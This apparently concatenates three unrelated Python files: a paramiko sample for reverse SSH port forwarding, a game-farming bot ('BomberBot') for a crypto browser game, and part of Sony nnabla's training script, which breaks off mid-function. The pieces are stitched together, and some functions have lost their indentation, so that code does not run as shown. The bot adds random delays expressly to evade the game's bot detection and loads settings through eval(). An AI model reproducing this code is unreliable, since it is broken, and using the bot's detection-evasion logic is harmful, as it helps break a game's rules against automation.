Sample script showing how to do remote port forwarding over paramiko.
This script connects to the requested SSH server and sets up remote port
forwarding (the openssh -R option) from a remote port through a tunneled
connection to a destination reachable from the local machine.
"""
import getpass
import os
import socket
import select
import sys
import threading
from optparse import OptionParser
import paramiko
SSH_PORT = 22
DEFAULT_PORT = 4000
g_verbose = True
def handler(chan, host, port):
    """Relay bytes between an accepted forwarded channel and (host, port).

    Runs in its own thread: opens a TCP connection to the destination and
    pumps data in both directions until either side closes.
    """
    sock = socket.socket()
    try:
        sock.connect((host, port))
    except Exception as e:
        verbose('Forwarding request to %s:%d failed: %r' % (host, port, e))
        return

    verbose('Connected! Tunnel open %r -> %r -> %r' % (chan.origin_addr,
                                                       chan.getpeername(), (host, port)))
    while True:
        # Block until either endpoint has data, then forward it to the other
        r, w, x = select.select([sock, chan], [], [])
        if sock in r:
            data = sock.recv(1024)
            if len(data) == 0:
                break  # destination closed
            chan.send(data)
        if chan in r:
            data = chan.recv(1024)
            if len(data) == 0:
                break  # SSH channel closed
            sock.send(data)
    chan.close()
    sock.close()
    verbose('Tunnel closed from %r' % (chan.origin_addr,))
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
    """Request remote forwarding of `server_port` and service connections.

    Blocks forever: each channel the SSH server hands us is serviced by a
    daemon `handler` thread that relays traffic to (remote_host, remote_port).
    """
    transport.request_port_forward('', server_port)
    while True:
        chan = transport.accept(1000)
        if chan is None:
            continue
        thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port))
        # Use the `daemon` attribute; Thread.setDaemon() is deprecated
        thr.daemon = True
        thr.start()
def verbose(s):
    """Print *s* only when global verbose output (g_verbose) is enabled."""
    if not g_verbose:
        return
    print(s)
HELP = """\
Set up a reverse forwarding tunnel across an SSH server, using paramiko. A
port on the SSH server (given with -p) is forwarded across an SSH session
back to the local machine, and out to a remote site reachable from this
network. This is similar to the openssh -R option.
"""
def get_host_port(spec, default_port):
    "parse 'hostname:22' into a host and port, with the port optional"
    host, sep, port_text = spec.partition(':')
    # Fall back to the default when no ':' was present; int() raises for
    # malformed port text, matching the original behavior.
    port = int(port_text) if sep else int(default_port)
    return host, port
def parse_options():
    """Parse command-line options for the reverse-forwarding script.

    Returns (options, (server_host, server_port), (remote_host, remote_port)).
    Exits via parser.error() on bad input; also sets the global g_verbose flag.
    """
    global g_verbose

    parser = OptionParser(usage='usage: %prog [options] <ssh-server>[:<server-port>]',
                          version='%prog 1.0', description=HELP)
    parser.add_option('-q', '--quiet', action='store_false', dest='verbose', default=True,
                      help='squelch all informational output')
    parser.add_option('-p', '--remote-port', action='store', type='int', dest='port',
                      default=DEFAULT_PORT,
                      help='port on server to forward (default: %d)' % DEFAULT_PORT)
    parser.add_option('-u', '--user', action='store', type='string', dest='user',
                      default=getpass.getuser(),
                      help='username for SSH authentication (default: %s)' % getpass.getuser())
    parser.add_option('-K', '--key', action='store', type='string', dest='keyfile',
                      default=None,
                      help='private key file to use for SSH authentication')
    parser.add_option('', '--no-key', action='store_false', dest='look_for_keys', default=True,
                      help='don\'t look for or use a private key file')
    parser.add_option('-P', '--password', action='store_true', dest='readpass', default=False,
                      help='read password (for key or password auth) from stdin')
    parser.add_option('-r', '--remote', action='store', type='string', dest='remote', default=None, metavar='host:port',
                      help='remote host and port to forward to')
    options, args = parser.parse_args()

    if len(args) != 1:
        parser.error('Incorrect number of arguments.')
    if options.remote is None:
        parser.error('Remote address required (-r).')

    g_verbose = options.verbose
    server_host, server_port = get_host_port(args[0], SSH_PORT)
    remote_host, remote_port = get_host_port(options.remote, SSH_PORT)
    return options, (server_host, server_port), (remote_host, remote_port)
def main():
    """Entry point: connect to the SSH server and run the reverse tunnel."""
    options, server, remote = parse_options()

    password = None
    if options.readpass:
        password = getpass.getpass('Enter SSH password: ')

    client = paramiko.SSHClient()
    client.load_system_host_keys()
    client.set_missing_host_key_policy(paramiko.WarningPolicy())

    verbose('Connecting to ssh host %s:%d ...' % (server[0], server[1]))
    try:
        client.connect(server[0], server[1], username=options.user, key_filename=options.keyfile,
                       look_for_keys=options.look_for_keys, password=password)
    except Exception as e:
        print('*** Failed to connect to %s:%d: %r' % (server[0], server[1], e))
        sys.exit(1)

    verbose('Now forwarding remote port %d to %s:%d ...' % (options.port, remote[0], remote[1]))
    # Blocks until interrupted; Ctrl-C ends the forwarding cleanly
    try:
        reverse_forward_tunnel(options.port, remote[0], remote[1], client.get_transport())
    except KeyboardInterrupt:
        print('C-c: Port forwarding stopped.')
        sys.exit(0)
if __name__ == '__main__':
main()
|
bombV1.04.py | # MIT License
#
# Copyright (c) 2021 Pablo Henrique
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import colorama
import pyautogui
import time
import threading
import configparser
import random
from colorama import Fore
from datetime import datetime
import glob
import cv2
pyautogui.FAILSAFE = False  # disable pyautogui's move-to-corner abort safeguard
now = datetime.now()
current_time = now.strftime("[%H:%M:%S]")
colorama.init()
config = configparser.ConfigParser()
config.read('settings.ini')

# Runtime counters reported periodically by show_stats()
MapsCleared = 0
CiclesDone = 0
ErrorsFound = 0
UseMouse = True

# Screen coordinates and tuning values loaded from settings.ini.
# NOTE(review): eval() executes arbitrary expressions from the ini file even
# with empty globals/locals; ast.literal_eval would be safer for coordinate
# tuples -- confirm before changing.
BotaoWork = eval(config.get('settings', 'BotaoWork'), {}, {})
BotaoClose = eval(config.get('settings', 'BotaoClose'), {}, {})
BotaoMapa = eval(config.get('settings', 'BotaoMapa'), {}, {})
BotaoVoltar = eval(config.get('settings', 'BotaoVoltar'), {}, {})
BotaoHeroes = eval(config.get('settings', 'BotaoHeroes'), {}, {})
BotaoConnect = eval(config.get('settings', 'BotaoConnect'), {}, {})
BotaoMeta = eval(config.get('settings', 'BotaoMeta'), {}, {})
BotaoNewMap = eval(config.get('settings', 'BotaoNewMap'), {}, {})
TabsMeta = int(config['settings']['TabsMeta'])
PosicaoScroll = eval(config.get('settings', 'PosicaoScroll'), {}, {})
NumScroll = int(config['settings']['NumScroll'])
VelScroll = int(config['settings']['VelScroll'])
DelayFarm = int(config['settings']['DelayFarm'])
DelayStats = int(config['settings']['DelayStats'])
Heroes = int(config['settings']['Heroes'])
DelayToStart = int(config['settings']['DelayToStart'])
AntiDetection = bool(config.getboolean('settings', 'AntiDetection'))
AntiBot = int  # NOTE(review): bound to the int *type* as a placeholder; reassigned in tempo_farm()
MultiAccount = bool(config.getboolean('settings', 'MultiAccount'))
Accounts = int(config['settings']['Accounts'])
def pprint(text):
    """Print *text* prefixed with the current [HH:MM:SS] timestamp."""
    stamp = datetime.now().strftime("[%H:%M:%S]")
    print(stamp + str(text))
# Put the heroes to work function
def work():
    """Click through the hero list and send each hero to work.

    Uses the screen coordinates loaded from settings.ini; increments the
    global CiclesDone counter when the cycle completes.
    """
    global CiclesDone
    print(datetime.now().strftime("[%H:%M:%S]") + 'Putting heroes to work...')
    time.sleep(3)
    pyautogui.moveTo(BotaoVoltar)
    pyautogui.click()
    time.sleep(3)
    pyautogui.moveTo(BotaoHeroes)
    pyautogui.click()
    time.sleep(3)
    pyautogui.moveTo(PosicaoScroll)
    time.sleep(0.5)
    pyautogui.click()
    # Scroll the hero list into view before clicking the work button
    for s in range(NumScroll):
        pyautogui.scroll(VelScroll)
        time.sleep(0.5)
    time.sleep(2)
    # One work-click per configured hero
    for _ in range(Heroes):
        pyautogui.moveTo(BotaoWork)
        pyautogui.click()
        time.sleep(2)
    time.sleep(1)
    pyautogui.moveTo(BotaoClose)
    pyautogui.click()
    CiclesDone = CiclesDone + 1
# Open map from initial page
def abrir_mapa():
    """Open the game map from the initial page (single-account mode)."""
    print(datetime.now().strftime("[%H:%M:%S]") + "Opening map...")
    time.sleep(3)
    pyautogui.moveTo(BotaoMapa)
    pyautogui.click()
# Open map multi acc
def abrir_mapa2():
    """Open the map for every configured account (multi-account mode).

    Reads each account's map-button position from multi<N>.ini; as a side
    effect rebinds the global BotaoMapa to the last account's value.
    """
    print(datetime.now().strftime("[%H:%M:%S]") + "Opening map...")
    time.sleep(3)
    for i in range(1, Accounts + 1):
        config = configparser.ConfigParser()
        aux = (f'multi{str(i)}.ini')
        config.read(aux)
        global BotaoMapa
        BotaoMapa = eval(config.get('settings', 'BotaoMapa'), {}, {})
        pyautogui.moveTo(BotaoMapa)
        pyautogui.click()
# Single Account farm
def bot():
    """Single-account farm loop: open map, work heroes, reopen map, wait."""
    while True:
        abrir_mapa()
        work()
        abrir_mapa()
        tempo_farm()
# Multiacc loop farm
def multiacc():
    """Multi-account farm loop.

    For each account, loads its screen coordinates from multi<N>.ini into
    the shared module-level globals, then runs one map/work/wait cycle.
    """
    global Accounts
    global CurrentConfig
    while True:
        for i in range(1, Accounts + 1):
            config = configparser.ConfigParser()
            aux = (f'multi{str(i)}.ini')
            config.read(aux)
            global BotaoWork
            global BotaoClose
            global BotaoMapa
            global BotaoVoltar
            global BotaoHeroes
            global BotaoNewMap
            global PosicaoScroll
            global VelScroll
            global Heroes
            global NumScroll
            # Rebind the shared coordinate globals to this account's values
            BotaoWork = eval(config.get('settings', 'BotaoWork'), {}, {})
            BotaoClose = eval(config.get('settings', 'BotaoClose'), {}, {})
            BotaoMapa = eval(config.get('settings', 'BotaoMapa'), {}, {})
            BotaoVoltar = eval(config.get('settings', 'BotaoVoltar'), {}, {})
            BotaoHeroes = eval(config.get('settings', 'BotaoHeroes'), {}, {})
            BotaoNewMap = eval(config.get('settings', 'BotaoNewMap'), {}, {})
            PosicaoScroll = eval(config.get('settings', 'PosicaoScroll'), {}, {})
            NumScroll = int(config['settings']['NumScroll'])
            VelScroll = int(config['settings']['VelScroll'])
            Heroes = int(config['settings']['Heroes'])
            abrir_mapa()
            work()
            abrir_mapa()
            tempo_farm()
# Time to delay the work function
def tempo_farm():
    """Sleep between farm cycles, printing a live countdown.

    When AntiDetection is enabled, a random 300-1200 second offset is added
    to DelayFarm so cycles don't follow a fixed pattern.
    """
    global DelayFarm
    global AntiBot
    global AntiDetection
    if AntiDetection:
        AntiBot = random.randint(300, 1200)
    else:
        AntiBot = 0
    anti_bot = int(AntiBot)
    mins, secs = divmod(anti_bot, 60)
    formatTime = (f'{mins:02d}:{secs:02d}')
    print(datetime.now().strftime("[%H:%M:%S]") + f"Added: [{formatTime}] minutes for avoid pattern detection")
    countdown = DelayFarm + anti_bot
    # Tick once per second, rewriting the same console line (\r)
    while countdown:
        mins, secs = divmod(countdown, 60)
        hours, mins = divmod(mins, 60)
        timeformat = (f'{hours:d}:{mins:02d}:{secs:02d}')
        print(datetime.now().strftime("[%H:%M:%S]") + f"Heroes farming/resting. Waiting timer:\t[{timeformat}]\r",
              end="")
        time.sleep(1)
        countdown -= 1
# Check for errors
def check_errors():
    """Watch the screen for known error popups (Errors/*.png) and dismiss them.

    Runs forever in its own thread: on a match it clicks the popup, hard
    refreshes the page (ctrl+F5) and bumps the ErrorsFound counter.
    """
    global ErrorsFound
    while True:
        errors = glob.glob("Errors/*.png")
        for erro in errors:
            erro = pyautogui.locateCenterOnScreen(erro, confidence=0.8)
            if erro:
                print("Error found")
                pyautogui.moveTo(erro)
                time.sleep(0.7)
                pyautogui.click(erro)
                pyautogui.hotkey('ctrl', 'f5')
                ErrorsFound = ErrorsFound + 1
                #connect()
                #time.sleep(60)
# Click next map
def check_map():
    """Watch for the "new map" button (NewMap/*.png) and double-click it.

    Runs forever in its own thread; increments MapsCleared on each match.
    """
    global MapsCleared
    maps = glob.glob("NewMap/*.png")
    while True:
        for map in maps:  # NOTE(review): `map` shadows the builtin
            map = pyautogui.locateCenterOnScreen(map, confidence=0.9)
            if map:
                pyautogui.moveTo(map)
                time.sleep(0.8)
                pyautogui.click()
                time.sleep(1)
                pyautogui.click()
                MapsCleared = MapsCleared + 1
# Use Mouse to login
def mouse_login():
    """Locate the sign-in button on screen and click it.

    In multi-account mode searches Imgs\\SIGN<i>.png per account; otherwise
    uses the single Imgs\\SIGN.png image.
    """
    print("Using mouse to login")
    aux = None
    if MultiAccount:
        # NOTE(review): range(1, Accounts) skips the last account, unlike the
        # range(1, Accounts + 1) loops used elsewhere in this file -- confirm
        for i in range(1, Accounts):
            sign = pyautogui.locateCenterOnScreen(f"Imgs\\SIGN{i}.png", confidence=0.9)
            if sign:
                print("Sign found")
                aux = sign
    else:
        sign = pyautogui.locateCenterOnScreen(f"Imgs\\SIGN.png", confidence=0.9)
        if sign:
            print("Sign found")
            aux = sign
    if aux:
        pyautogui.moveTo(aux)
        time.sleep(3)
        pyautogui.click()
        print("Sign Clicked")
        time.sleep(15)
    else:
        print("Sign not Clicked")
# Connect from mainpage
def connect():
    """Detect the game's main/login page and reconnect.

    Runs forever in its own thread. When a main-page image (Imgs/MAIN*.png)
    is found on screen it clicks it, refreshes after 3 failed attempts,
    performs the mouse login (directly and/or via the MetaMask tab) and
    finally reopens the map.

    Fix: the final branch previously called abrir_mapa2() for both modes;
    single-account mode now uses abrir_mapa(), matching bot()/multiacc().
    """
    global UseMouse
    retries = 0
    main = glob.glob(f"Imgs/MAIN*.png")
    time.sleep(5)
    while True:
        aux = None
        auxAba = None
        # Scan for any main-page template; keep the last hit
        for img in main:
            img = pyautogui.locateCenterOnScreen(img, confidence=0.5)
            aux = img
        if aux:
            print("\n")
            pprint(Fore.RED + "Reconnecting.")
            print(Fore.MAGENTA)
            print("\n")
            aux2 = aux
            pyautogui.moveTo(aux2)
            pyautogui.click()
            time.sleep(3)
            retries = retries + 1
            print(f"\nretries:{retries}\n")
            if retries >= 3:
                # Too many failed attempts: refresh the page and start over
                pyautogui.press('f5')
                retries = 0
            if UseMouse:
                mouse_login()
            # Look for the MetaMask tab for a while; keep the last hit
            for _ in range(15):
                Aba = pyautogui.locateCenterOnScreen("Imgs\\ABAMETA.png", confidence=0.9)
                if Aba:
                    auxAba = Aba
            if auxAba:
                pyautogui.moveTo(auxAba)
                time.sleep(0.3)
                pyautogui.click()
                mouse_login()
            time.sleep(20)
            if MultiAccount:
                abrir_mapa2()
            else:
                abrir_mapa()
# Show farm stats
def show_stats():
    """Periodically print the run counters (cycles, maps, errors).

    Runs forever in its own thread; sleeps 600 seconds plus DelayStats
    between reports.
    """
    while True:
        time.sleep(600)
        print("\n")
        print(Fore.BLUE + "-" * 80)
        print(Fore.BLUE + datetime.now().strftime("[%H:%M:%S]") + "Cicles of farming done: " + str(CiclesDone))
        print(Fore.BLUE + datetime.now().strftime("[%H:%M:%S]") + "Maps Cleared: " + str(MapsCleared))
        print(Fore.BLUE + datetime.now().strftime("[%H:%M:%S]") + "Errors found: " + str(ErrorsFound))
        print(Fore.BLUE + "-" * 80)
        print("\n")
        print(Fore.MAGENTA)
        time.sleep(DelayStats)
# Start threading
def threads():
    """Spawn all worker threads (watchers, farm loop, stats, reconnect)
    and block until every one of them finishes."""
    farm_target = multiacc if MultiAccount else bot
    workers = [
        threading.Thread(target=check_errors),
        threading.Thread(target=check_map),
        threading.Thread(target=farm_target),
        threading.Thread(target=show_stats),
        threading.Thread(target=connect),
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
# Startup banner printed once at import time
string1 = "BomberBot V1.04"
string2 = "Telegram:t.me/BomberBotBB"
string3 = "Github:github.com/henr1q/BomberBot"
string4 = f"Metamask:{Fore.CYAN}0x94843B902427006bedaC7fb24039500411D599Ac"
string5 = "This bot is FREE."
print(Fore.GREEN + "=" * 40)
print(Fore.BLUE + string1.center(40, " "))
print(Fore.BLUE + string2.center(40, " "))
print(Fore.BLUE + string3.center(40, " "))
print(Fore.BLUE + string4.center(40, " "))
print(Fore.BLUE + Fore.RED + string5.center(40, " "))
print(Fore.GREEN + "=" * 40)
print(Fore.GREEN)
def botmenu():
    """Interactive console menu: run the bot, test a single function, or exit.

    Recurses into itself after each tested function so the menu reappears.
    """
    menu = int(input(
        "Choose a option:\n1)Run the bot\n2)Test/Debug a single function(Use this if you having problems with mapping)\n3)Exit\n\n"))
    print(Fore.MAGENTA)
    if menu == 1:
        defaultdelay = 10
        print(datetime.now().strftime(
            "[%H:%M:%S]") + f"Bot will start in {defaultdelay + DelayToStart} seconds. Make sure to go to the main page.")
        time.sleep(10 + DelayToStart)
        threads()
    elif menu == 2:
        menu2 = int(input(datetime.now().strftime(
            "\n[%H:%M:%S]") + "Choose a function to test it:\n1)Open Map\n2)Put heroes to work\n3)Connect from login page\n4)Find and click next map\n5)Check for error and try reconnect\n6)Relog from main page stuck\n7)Exit\n\n"))
        if menu2 == 1:
            print(Fore.CYAN + datetime.now().strftime(
                "[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should work.")
            time.sleep(5)
            abrir_mapa()
            botmenu()
        if menu2 == 2:
            print(Fore.CYAN + datetime.now().strftime(
                "[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should work.")
            time.sleep(5)
            work()
            botmenu()
        if menu2 == 3:
            print(Fore.CYAN + datetime.now().strftime(
                "[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should worke.")
            time.sleep(5)
            connect()
            botmenu()
        if menu2 == 4:
            print(Fore.CYAN + datetime.now().strftime(
                "[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should work.")
            time.sleep(5)
            check_map()
            botmenu()
        if menu2 == 5:
            print(Fore.CYAN + datetime.now().strftime(
                "[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should work.")
            time.sleep(5)
            check_errors()
            botmenu()
        if menu2 == 6:
            # NOTE(review): no relog function is actually called here -- confirm
            print(Fore.CYAN + datetime.now().strftime(
                "[%H:%M:%S]") + "Delaying 5 seconds and starting the function. Make sure to go to the page where function should work.")
            print("This function takes 3 minutes on main page")
            time.sleep(5)
            botmenu()
        if menu2 == 7:
            print(Fore.GREEN)
            botmenu()
        else:
            print(Fore.RED + datetime.now().strftime("[%H:%M:%S]") + "Choose a valid option")
    elif menu == 3:
        # NOTE(review): prints "Error" instead of exiting; sys.exit() is
        # commented out (and sys is not imported) -- confirm intended
        print("Error")
        #sys.exit()
    else:
        print(Fore.RED + datetime.now().strftime("[%H:%M:%S]") + "Choose a valid option")
botmenu()
|
train.py | # Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from six.moves import range
from collections import OrderedDict
from contextlib2 import ExitStack # Backport from python3
import numpy as np
import glob
import os
import time
import zipfile
import nnabla as nn
from nnabla.logger import logger
from nnabla import available_contexts
from nnabla.parameter import save_parameters
from nnabla.utils.progress import configure_progress, progress
from nnabla.utils.cli.utility import let_data_to_variable
from nnabla.utils.nnp_format import nnp_version
from nnabla.utils.communicator_util import current_communicator, single_or_rankzero
import nnabla.utils.load as load
_save_parameter_info = {}
def _all_reduce(comm, var, division, inplace):
    """All-reduce *var* across MPI ranks with a stall watchdog.

    A background thread polls a closure flag while the (blocking)
    ``comm.all_reduce`` call runs; if the reduce has not finished after
    ~100 s (10000 * 0.01 s sleeps) the watchdog logs the stalled rank and
    kills the process, so a hung rank cannot deadlock the whole job.
    """
    import threading
    _finish = False

    def _wait():
        import time
        import sys
        count = 0
        while not _finish:
            # ~100 seconds without completion is treated as a stall.
            if count > 10000:
                logger.log(99, "STALLED MPI RANK {}".format(comm.rank))
                sys.exit(-1)
            time.sleep(0.01)
            count += 1

    th = threading.Thread(target=_wait)
    th.start()
    comm.all_reduce(var, division=division, inplace=inplace)
    # Rebinding the closure variable is observed by _wait on its next poll.
    _finish = True
    th.join()
def _save_parameters(args, suffix, epoch, force=False):
    """Write a ``results_{suffix}_{epoch}.nnp`` snapshot into ``args.outdir``.

    Saves are throttled: a snapshot is only written when *force* is set,
    more than 180 s passed since the last save for this *suffix*, or more
    than 10 epochs elapsed. For suffix ``'best'`` the file is named
    ``results.nnp``. Older ``results_{suffix}_*.nnp`` files (globbed before
    the new one is written) are deleted after a successful save.

    Relies on the module-global ``_save_parameter_info``; in particular
    ``_save_parameter_info['config']`` must have been set by
    ``train_command`` before the first save, or this raises KeyError.
    """
    global _save_parameter_info
    if suffix not in _save_parameter_info:
        _save_parameter_info[suffix] = {}
        _save_parameter_info[suffix]['epoch'] = 0
        _save_parameter_info[suffix]['time'] = 0
    current_time = time.time()
    timediff = current_time - _save_parameter_info[suffix]['time']
    epochdiff = epoch - _save_parameter_info[suffix]['epoch']
    # Collect stale snapshots now, so the file written below is not deleted.
    globname = os.path.join(args.outdir, 'results_{}_*.nnp'.format(suffix))
    exists = glob.glob(globname)
    base = os.path.join(args.outdir, 'results_{}_{}'.format(suffix, epoch))
    if suffix == 'best':
        base = os.path.join(args.outdir, 'results')
    filename = base + '.nnp'
    if force or timediff > 180.0 or epochdiff > 10:
        # The .nnp archive bundles version, network config and parameters.
        version_filename = base + '_version.txt'
        with open(version_filename, 'w') as file:
            file.write('{}\n'.format(nnp_version()))
        param_filename = base + '_param.protobuf'
        save_parameters(param_filename)
        with zipfile.ZipFile(filename, 'w') as nnp:
            nnp.write(version_filename, 'nnp_version.txt')
            nnp.write(_save_parameter_info['config'], os.path.basename(
                _save_parameter_info['config']))
            nnp.write(param_filename, 'parameter.protobuf')
        # Temporary members are only needed inside the archive.
        os.unlink(version_filename)
        os.unlink(param_filename)
        for exist in exists:
            os.unlink(exist)
        _save_parameter_info[suffix]['epoch'] = epoch
        _save_parameter_info[suffix]['time'] = current_time
def _update(iter, config, cost):
    """Run one training iteration over every optimizer in *config*.

    For each optimizer: feed data, forward, backward, and (at the update
    interval) apply weight decay, all-reduce gradients across ranks,
    and step the solver. Loss accumulation into *cost* is deliberately
    deferred by one iteration so input transfer overlaps GPU compute.
    Returns the (mutated) *cost* accumulator.
    """
    comm = current_communicator()
    loaded_data = {}
    is_first_optimizer = True

    def _sum_cost():
        # Fold the per-iteration loss into the epoch totals; with a
        # communicator the loss is summed across all ranks first.
        if comm:
            # logger.log(99, "Calc cost with communicator")
            var = [nn.NdArray()]
            var[0].data = cost.sum_iteration
            _all_reduce(comm, var, division=False, inplace=True)
            cost.sum_epoch += var[0].data
            cost.num_iteration += comm.size
        else:
            cost.sum_epoch += cost.sum_iteration
            cost.num_iteration += 1

    for opt in config.optimizers.values():
        o = opt.optimizer
        # Load dataset (one batch per data iterator, shared between
        # optimizers that use the same iterator).
        di = opt.data_iterator
        if o.data_iterator not in loaded_data:
            loaded_data[o.data_iterator] = di.next()
        data = loaded_data[o.data_iterator]
        for v, d in o.dataset_assign.items():
            dest_context = config.global_config.default_context if not o.forward_sequence or v not in o.forward_sequence[
                0].inputs else None
            let_data_to_variable(v.variable_instance, data[
                di.variables.index(d)], ctx=dest_context,
                data_name=d, variable_name=v.name)
        # Generate data
        for v, generator in o.generator_assign.items():
            dest_context = config.global_config.default_context if not o.forward_sequence or v not in o.forward_sequence[
                0].inputs else None
            let_data_to_variable(v.variable_instance,
                                 data=generator(v.shape), ctx=dest_context,
                                 variable_name=v.name)
        # Monitor loss before forward to prepare input data while processing on
        # GPU (cost.variables holds the PREVIOUS iteration's loss variables).
        if cost.variables:
            for l in cost.variables:
                cost.sum_iteration += np.mean(l.variable_instance.d)
                l.variable_instance.data.zero()
            if is_first_optimizer:
                is_first_optimizer = False
                _sum_cost()
                if single_or_rankzero():
                    progress("Training : cost={0:0.6f}".format(cost.sum_iteration),
                             (iter % config.training_config.iter_per_epoch) * 1.0 / config.training_config.iter_per_epoch)
                cost.sum_iteration = 0.0
        # Forward
        o.network.forward(o.forward_sequence)
        # Backward (gradients are cleared only on the first step of each
        # update interval).
        o.network.backward(o.backward_sequence, iter % o.update_interval == 0)
        # Update
        if iter % o.update_interval == o.update_interval - 1:
            if o.weight_decay > 0:
                o.solver.weight_decay(o.weight_decay)
            if o.comm:  # Updated param with communicator
                params = [x.grad for x in o.parameters.values()]
                _all_reduce(o.comm, params, division=True, inplace=True)
            if o.scheduler is not None:
                o.solver.set_learning_rate(o.scheduler.get_learning_rate(iter))
            o.solver.update()
        # Sync w sometimes, to keep weights from drifting across ranks.
        if iter % 10 == 9:  # TODO: change the interval
            if o.comm:
                params = [x.data for x in o.parameters.values()]
                _all_reduce(o.comm, params, division=True, inplace=True)
        # Reserve monitor loss for the next call.
        cost.variables = o.loss_variables

    # Monitor loss at the end of iteration (flush the deferred loss at the
    # epoch boundary so the epoch average includes every iteration).
    if iter % config.training_config.iter_per_epoch == config.training_config.iter_per_epoch - 1 and cost.variables:
        for l in cost.variables:
            cost.sum_iteration += np.mean(l.variable_instance.d)
            l.variable_instance.data.zero()
        _sum_cost()
        cost.variables = None
        cost.sum_iteration = 0.0

    return cost
def _evaluate(args, config, monitoring_report, best_error, epoch):
    """Run every monitor over its dataset and track the best validation error.

    Appends one ``name: error`` line per monitor to *monitoring_report*,
    builds a human-readable ``{name=err, ...}`` string, and — on rank 0 —
    saves a 'best' parameter snapshot when the monitor named
    ``valid_error`` improves (or when save_best is disabled).

    Returns ``(best_error, error_str)``.
    """
    comm = current_communicator()
    error_str = ''
    valid_error = 0.0

    def _sum_error(sum, error):
        # Accumulate, summing across ranks first when a communicator exists.
        ret = None
        if comm:
            # logger.log(99, "Calc error with communicator")
            var = [nn.NdArray()]
            var[0].data = error
            _all_reduce(comm, var, division=False, inplace=True)
            ret = sum + var[0].data
        else:
            ret = sum + error
        return ret

    for name, mon in config.monitors.items():
        m = mon.monitor
        error_sum_monitor = 0.0
        error_count = 0
        di = mon.data_iterator
        for i in range(di.size // di.batch_size):
            # Set data to variable
            data = di.next()
            for v, d in m.dataset_assign.items():
                dest_context = config.global_config.default_context if not m.forward_sequence or v not in m.forward_sequence[
                    0].inputs else None
                let_data_to_variable(v.variable_instance, data[
                    di.variables.index(d)], ctx=dest_context,
                    data_name=d, variable_name=v.name)
            # Generate data
            for v, generator in m.generator_assign.items():
                dest_context = config.global_config.default_context if not m.forward_sequence or v not in m.forward_sequence[
                    0].inputs else None
                let_data_to_variable(v.variable_instance,
                                     data=generator(v.shape), ctx=dest_context,
                                     variable_name=v.name)
            # Sum error before forward to prepare input data while processing
            # on GPU (errors of the previous batch are read here).
            if error_count > 0:
                error_sum = 0.0
                for v in m.monitor_variables:
                    error_sum += np.mean(v.variable_instance.d)
                    v.variable_instance.data.zero()
                error_sum_monitor = _sum_error(error_sum_monitor, error_sum)
                if single_or_rankzero():
                    progress('Evaluating "{0}"'.format(
                        name) + ' : error={0:0.6f}'.format(
                        error_sum_monitor / error_count),
                        di.position * 1.0 / di.size)
            error_count += comm.size if comm else 1
            # Forward recursive
            m.network.forward(m.forward_sequence)
        # Sum error at the end of dataset (last batch's deferred error).
        error_sum = 0.0
        for v in m.monitor_variables:
            error_sum += np.mean(v.variable_instance.d)
            v.variable_instance.data.zero()
        error_sum_monitor = _sum_error(error_sum_monitor, error_sum)
        if error_count == 0:
            error = 0
        else:
            error = error_sum_monitor / error_count
        monitoring_report.append(' {}: {}\n'.format(name, error))
        if error_str != '':
            error_str += ', '
        else:
            error_str = ' {'
        error_str += '{}={:.6f}'.format(name, error)
        if name == 'valid_error':
            valid_error = error

    if error_str != '':
        error_str += '}'

    # Save Parameters
    if single_or_rankzero():
        # BUGFIX: the previous condition used `not best_error`, which also
        # matched a best error of exactly 0.0 and let a worse epoch
        # overwrite the best snapshot. Only None means "no best yet".
        if (not config.training_config.save_best) or \
                best_error is None or \
                valid_error <= best_error:
            best_error = valid_error
            _save_parameters(args, 'best', epoch, True)

    return best_error, error_str
def _get_current_parameter(args):
globname = os.path.join(args.outdir, 'results_current_*.nnp')
exists = glob.glob(globname)
if len(exists) > 0:
ex_list = {}
for ex in exists:
n = int(ex.rsplit('_', 1)[1].rsplit('.', 1)[0])
ex_list[n] = ex
last_epoch = sorted(ex_list.keys())[0]
last_parameter = ex_list[last_epoch]
logger.log(99, "Load parameter from [{}]".format(
os.path.basename(last_parameter)))
load.load([last_parameter], parameter_only=True)
return last_epoch
return 0
def _calc_estimate_time(timeinfo, max_iter, last_iter, iter):
timeinfo.past_time = time.time() - timeinfo.start_time
timeinfo.estimate_time = timeinfo.past_time * \
(max_iter - last_iter) / (iter - last_iter)
timeinfo.remain_time = timeinfo.estimate_time - timeinfo.past_time
timeinfo.last_past_time = timeinfo.past_time
return timeinfo
def _train(args, config):
    """Main training loop: iterate from the resume point to max_iteration.

    Per epoch it evaluates monitors, appends to monitoring_report.yml, and
    saves a 'current' snapshot. Returns False when the projected run time
    exceeds ``config.timelimit``, True otherwise.
    """
    global _save_parameter_info
    comm = current_communicator()

